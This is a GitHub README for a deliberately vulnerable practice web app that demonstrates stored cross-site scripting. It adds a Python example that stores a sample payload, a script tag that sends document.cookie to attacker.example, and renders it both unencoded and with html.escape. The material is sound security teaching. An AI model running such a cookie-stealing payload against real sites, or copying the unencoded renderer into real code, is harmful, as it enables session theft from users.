https://github.com/qeeqbox/stored-cross-site-scripting
A threat actor may inject malicious content into a vulnerable target
- Host: GitHub
- URL: https://github.com/qeeqbox/stored-cross-site-scripting
- Owner: qeeqbox
- License: agpl-3.0
- Created: 2022-04-28T19:25:42.000Z (about 4 years ago)
- Default Branch: main
- Last Pushed: 2025-07-28T00:44:10.000Z (11 months ago)
- Last Synced: 2025-10-09T10:06:51.685Z (8 months ago)
- Topics: cross, example, infosecsimplified, metadata, qeeqbox, scripting, site, stored, visulization, vulnerability, xss-vulnerability
- Homepage:
- Size: 1.24 MB
- Stars: 4
- Watchers: 0
- Forks: 1
- Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE
README

Stored (persistent) cross-site scripting occurs when an application accepts user-supplied content, saves it on the server side (here in a database), and later embeds it into HTML pages served to other users without output encoding, so the attacker ends up controlling part of the page's Document Object Model (DOM). A threat actor exploits this by submitting a malicious payload that is stored in the trusted web application's database. When other users request pages that include the stored content, their browsers receive the payload in the HTTP(S) response and execute it in the context of the application's origin. In other words, the payload is persisted server-side, but its execution happens client-side, in the victim's browser.
Clone this current repo recursively
```sh
git clone --recurse-submodules https://github.com/qeeqbox/stored-cross-site-scripting
```
Run the webapp using Python
```sh
python3 stored-cross-site-scripting/vulnerable-web-app/webapp.py
```
Open the webapp in your browser at http://127.0.0.1:5142

Use the default credentials (username: admin and password: admin) to login

A threat actor could submit a malicious payload (for example, a script tag) in place of a normal ticket body

When the victim (the admin user) logs in and views the tickets, the payload is executed by their browser

If you examine the ticket section, you will see the stored payload there

## Code
When a user adds a ticket, the browser sends it to the webapp in a POST request to the add route; the handler passes the submitted ticket field to the add_ticket() function without any validation or encoding
```py
def do_POST(self):
    ...
    elif parsed_url.path == "/add":
        # post_request_data is the parsed form body; the first "ticket" value
        # is forwarded to add_ticket() exactly as the client submitted it
        self.add_ticket(post_request_data["ticket"][0])
        self.redirect(URL)
    ...
```
The add_ticket() function stores the user-supplied value verbatim in an SQLite database. The parameterized query protects against SQL injection, but nothing sanitizes or encodes the ticket before it is later rendered into the page, and that unencoded rendering is where the stored XSS occurs
```py
# connect is sqlite3.connect in the demo app
@logged_in
@check_access(access="ticket")
def add_ticket(self, ticket):
    with connect(DATABASE, isolation_level=None) as connection:
        cursor = connection.cursor()
        # bound parameters prevent SQL injection, but the raw HTML/JS payload
        # is persisted unchanged and will be served back to every viewer
        cursor.execute("INSERT into ticket(username, ticket) values(?,?)", (self.session["username"], ticket))
        return True
    return False
```
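The README shows the storage side but not the rendering side. The following added example (written for this page, not code from the qeeqbox project) reconstructs the full stored-XSS path with an in-memory SQLite table of the same shape, and pairs a hypothetical vulnerable renderer with a hardened one that applies output encoding at the HTML sink. The `render_tickets_vulnerable`, `render_tickets_safe` and `demo` functions, the sample payload and the `attacker.example` host are all assumptions for illustration.

```python
import html
import sqlite3

# Constructed sample payload (hypothetical; attacker.example is a reserved name)
PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'


def make_db():
    """Create an in-memory ticket table mirroring the demo app's schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ticket(username TEXT, ticket TEXT)")
    return conn


def add_ticket(conn, username, ticket):
    """Store the ticket verbatim, as the demo's add_ticket() does.

    The bound parameters stop SQL injection; persisting raw text is not
    itself the bug. The vulnerability appears at the rendering sink below.
    """
    conn.execute(
        "INSERT INTO ticket(username, ticket) VALUES (?, ?)",
        (username, ticket),
    )
    return True


def render_tickets_vulnerable(conn):
    """Hypothetical renderer: interpolates stored rows into HTML unencoded.

    Any viewer of this page (e.g. the admin) runs the stored script in the
    application's origin.
    """
    rows = conn.execute("SELECT username, ticket FROM ticket").fetchall()
    items = "".join(f"<li>{user}: {ticket}</li>" for user, ticket in rows)
    return f"<ul>{items}</ul>"


def render_tickets_safe(conn):
    """Same renderer with contextual output encoding at the HTML text sink.

    html.escape(quote=True) also neutralises quotes, so the same helper is
    safe for double-quoted attribute values.
    """
    rows = conn.execute("SELECT username, ticket FROM ticket").fetchall()
    items = "".join(
        f"<li>{html.escape(user, quote=True)}: {html.escape(ticket, quote=True)}</li>"
        for user, ticket in rows
    )
    return f"<ul>{items}</ul>"


def demo():
    """Store the payload once, then render it both ways."""
    conn = make_db()
    add_ticket(conn, "user", PAYLOAD)
    return render_tickets_vulnerable(conn), render_tickets_safe(conn)


if __name__ == "__main__":
    vulnerable, safe = demo()
    print("vulnerable:", vulnerable)
    print("safe:      ", safe)
```

The fix belongs at the output sink, not at storage time: encoding on the way in breaks legitimate content and misses other sinks, while encoding at the exact point of interpolation (HTML body here; a different encoder for JavaScript or URL contexts) is what the browser's parser needs to see. A restrictive Content-Security-Policy is useful defence in depth but does not replace the encoding.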